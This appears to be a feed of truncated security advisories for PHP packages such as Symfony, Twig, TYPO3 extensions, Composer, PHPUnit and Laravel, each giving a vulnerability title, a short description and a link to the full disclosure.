XSS in profiler HtmlDumper via unescaped template and profile names

More info at https://symfony.com/cve-2026-47730...

`template_from_string()` escapes a SourcePolicy-driven sandbox via synthesized template name

More info at https://symfony.com/cve-2026-46634...

Arbitrary PHP code execution via `_self.(<string>)` macro-reference compilation

More info at https://symfony.com/cve-2026-46640...

Sandbox property and method bypass via object-destructuring assignment

More info at https://symfony.com/cve-2026-46639...

SQL Injection in extension "News system" (news)

More info at https://typo3.org/security/advisory/typo3-ext-sa-2026-010...

TYPO3-EXT-SA-2026-009: Broken Access Control in extension "Frontend User Registration" (sf_register)

More info at https://typo3.org/security/advisory/typo3-ext-sa-2026-009...

TYPO3-EXT-SA-2026-012: SQL Injection in extension "Address List" (tt_address)

More info at https://typo3.org/security/advisory/typo3-ext-sa-2026-012...

TYPO3-EXT-SA-2026-011: Path Traversal in extension "Faceted Search" (ke_search)

More info at https://typo3.org/security/advisory/typo3-ext-sa-2026-011...

TYPO3-EXT-SA-2026-011: Path Traversal in extension "Faceted Search" (ke_search)

More info at https://typo3.org/security/advisory/typo3-ext-sa-2026-011...

TYPO3-EXT-SA-2026-011: XML External Entity Injection in extension "Faceted Search" (ke_search)

More info at https://typo3.org/security/advisory/typo3-ext-sa-2026-011...

Github Actions issued GITHUB_TOKEN disclosure in GitHub Actions logs

More info at https://github.com/composer/composer/security/advisories/GHSA-f9f8-rm49-7jv2...

Github Actions issued GITHUB_TOKEN disclosure in GitHub Actions logs

Summary Composer leaks the full contents of tokens configured as GitHub OAuth tokens if they do not match Composer's expected format for such tokens to stderr. GitHub has introduced a new format for GitHub Actions GITHUBTOKEN values. These tokens are validated in the same way by Composer on GitHu...

TYPO3-EXT-SA-2026-008: Remote Code Execution in extension "Site Crawler" (crawler)

More info at https://typo3.org/security/advisory/typo3-ext-sa-2026-008...

Remote code execution via evaluation of user-controlled input in validation rules

Impact A remote code execution RCE vulnerability affects versions 0.13.2 through 0.13.21. When documentation endpoints are publicly accessible and validation rules reference user-controlled input, request supplied data may be evaluated during documentation generation, leading to execution of...

Cross-site scripting (XSS) via script break-out in toScript() output

What's Changed Escape HTML tags in toScript output to prevent script break-out by @freekmurze in https://github.com/spatie/schema-org/pull/242 Values containing passed as schema properties could break out of the generated block and execute injected HTML when the value was attacker-controlled...

Argument injection via newline in PHP INI values forwarded to child processes

Impact PHPUnit forwards PHP INI settings to child processes used for isolated/PHPT test execution as -d name=value command-line arguments without neutralizing INI metacharacters. Because PHP's INI parser interprets " as a string delimiter, ; as the start of a comment, and most importantly a newli...

Argument injection via newline in PHP INI values forwarded to child processes

Impact PHPUnit forwards PHP INI settings to child processes used for isolated/PHPT test execution as -d name=value command-line arguments without neutralizing INI metacharacters. Because PHP's INI parser interprets " as a string delimiter, ; as the start of a comment, and most importantly a newli...

CVE-2026-24749 - DBFile permission bypass

More info at https://www.silverstripe.org/download/security-releases/cve-2026-24749...

Command injection via malicious Perforce repository definition

Impact The Perforce::generateP4Command method constructed shell commands by interpolating user-supplied Perforce connection parameters port, user, client without proper escaping. An attacker controlling a repository configuration in a malicious composer.json declaring a Perforce VCS repository...

Command injection via malicious Perforce source reference/url

Impact The Perforce::syncCodeBase method appended the $sourceReference parameter to a shell command without proper escaping, allowing an attacker to inject arbitrary commands through a crafted source reference containing shell metacharacters. Further as in GHSA-wg36-wvj6-r67p / CVE-2026-40176 the...

TYPO3-EXT-SA-2026-013: Remote Code Execution in extension "Content Element Selector" (ceselector)

More info at https://typo3.org/security/advisory/typo3-ext-sa-2026-013...

Denial of Service via "MadeYouReset" vulnerability

Versions of amphp/http-server prior to 3.4.4 for the 3.x release branch and prior to 2.1.10 for the 2.x release branch are vulnerable to the HTTP/2 "MadeYouReset" DoS attack described by CVE-2025-8671 and https://kb.cert.org/vuls/id/767506. In versions 3.4.4 and 2.1.10, stream reset protection ha...

Unsafe Deserialization in PHPT Code Coverage Handling

Overview A vulnerability has been discovered involving unsafe deserialization of code coverage data in PHPT test execution. The vulnerability exists in the cleanupForCoverage method, which deserializes code coverage files without validation, potentially allowing remote code execution if malicious...

Missing check that a point is on the prime subgroup for Edwards25519

More info at https://00f.net/2025/12/30/libsodium-vulnerability...

Key Commitment Issues in S3 Encryption Clients

More info at https://aws.amazon.com/security/security-bulletins/AWS-2025-032/...

TYPO3-EXT-SA-2025-007: Multiple vulnerabilities in extension "Backup Plus" (ns_backup)

More info at https://typo3.org/security/advisory/typo3-ext-sa-2025-007...

TYPO3-EXT-SA-2025-005: Cross-Site Scripting in extension "[clickstorm] SEO" (cs_seo)

More info at https://typo3.org/security/advisory/typo3-ext-sa-2025-005...

TYPO3-EXT-SA-2025-008: Multiple vulnerabilities in extension "Front End User Registration" (sr_feuser_register)

More info at https://typo3.org/security/advisory/typo3-ext-sa-2025-008...

symfony/ux-live-component Unsanitized HTML attribute injection via ComponentAttributes

More info at https://symfony.com/blog/symfony-ux-cve-2025-47946-unsanitized-html-attribute-injection-via-componentattributes...

symfony/ux-twig-component Unsanitized HTML attribute injection via ComponentAttributes

More info at https://symfony.com/blog/symfony-ux-cve-2025-47946-unsanitized-html-attribute-injection-via-componentattributes...

TYPO3-EXT-SA-2025-004: Insecure Direct Object Reference in extension "Download manager" (reint_downloadmanager)

More info at https://typo3.org/security/advisory/typo3-ext-sa-2025-004...

TYPO3-EXT-SA-2025-006: Insecure Direct Object Reference in extension "femanager" (femanager)

More info at https://typo3.org/security/advisory/typo3-ext-sa-2025-006...

SS-2025-001 - User enumeration via timing attack

More info at https://www.silverstripe.org/download/security-releases/ss-2025-001...

CVE-2025-30148 - XSS vulnerability in HTML editor

More info at https://www.silverstripe.org/download/security-releases/cve-2025-30148...

CVE-2025-25197 - XSS attack in elemental "Content blocks in use" report

More info at https://www.silverstripe.org/download/security-releases/cve-2025-25197...

GraphQL grant on a property might be cached with different objects

Original message: I found an issue with security grants on on properties in the GraphQL ItemNormalizer: If you use something like ApiPropertysecurity: 'isgranted"PROPERTYREAD", object, property' on a member of an entity, the grant gets cached and is only evaluated once, even if the object in...

GraphQL grant on a property might be cached with different objects

Original message: I found an issue with security grants on on properties in the GraphQL ItemNormalizer: If you use something like ApiPropertysecurity: 'isgranted"PROPERTYREAD", object, property' on a member of an entity, the grant gets cached and is only evaluated once, even if the object in...

GraphQL query operations security can be bypassed

Summary Using the Relay special node type you can bypass the configured security on an operation. Details Here is an example of how to apply security configurations for the GraphQL operations: php ApiResource security: "isgranted'ROLEUSER'", operations: / ... / , graphQlOperations: new...

GraphQL query operations security can be bypassed

Summary Using the Relay special node type you can bypass the configured security on an operation. Details Here is an example of how to apply security configurations for the GraphQL operations: php ApiResource security: "isgranted'ROLEUSER'", operations: / ... / , graphQlOperations: new...

TYPO3-EXT-SA-2025-002: Cross-Site Scripting in extension “Additional TCA” (additional_tca)

More info at https://typo3.org/security/advisory/typo3-ext-sa-2025-002...

TYPO3-EXT-SA-2025-003: Multiple vulnerabilities in extension “[clickstorm] SEO” (cs_seo)

More info at https://typo3.org/security/advisory/typo3-ext-sa-2025-003...

Missing output escaping for the null coalesce operator

More info at https://symfony.com/blog/twig-cve-2025-24374-missing-output-escaping-for-the-null-coalesce-operator...

TYPO3-EXT-SA-2025-001: Account Takeover in extension "OpenID Connect Authentication" (oidc)

More info at https://typo3.org/security/advisory/typo3-ext-sa-2025-001...

CVE-2024-53277 - XSS in form messages

More info at https://www.silverstripe.org/download/security-releases/cve-2024-53277...

CVE-2024-47605 - XSS via insert media remote file oembed

More info at https://www.silverstripe.org/download/security-releases/cve-2024-47605...

SS-2024-002 - Reflected Cross Site Scripting (XSS) in error message

More info at https://www.silverstripe.org/download/security-releases/ss-2024-002...

Insufficient nonce entropy

Impact Nonce generation does not use sufficient entropy nor a cryptographically secure pseudorandom source https://github.com/guzzle/oauth-subscriber/blob/0.8.0/src/Oauth1.phpL192. This can leave servers vulnerable to replay attacks when TLS is not used. Patches Upgrade to version 0.8.1 or higher...

Laravel Reflected XSS via Route Parameter in Debug-Mode Error Page

Laravel Reflected XSS via Route Parameter in Debug-Mode Error Page Vulnerability Overview The Laravel framework versions between 11.9.0 and 11.35.1 are susceptible to reflected cross-site scripting due to an improper encoding of route parameters in the debug-mode error page. Identifier :...

Laravel Reflected XSS via Request Parameter in Debug-Mode Error Page

Laravel Reflected XSS via Request Parameter in Debug-Mode Error Page Vulnerability Overview The Laravel framework versions between 11.9.0 and 11.35.1 are susceptible to reflected cross-site scripting due to an improper encoding of request parameters in the debug-mode error page. Identifier :...

Laravel environment manipulation via query string

Description When the registerargcargv php directive is set to on , and users call any URL with a special crafted query string, they are able to change the environment used by the framework when handling the request. Resolution The framework now ignores argv values for environment detection on...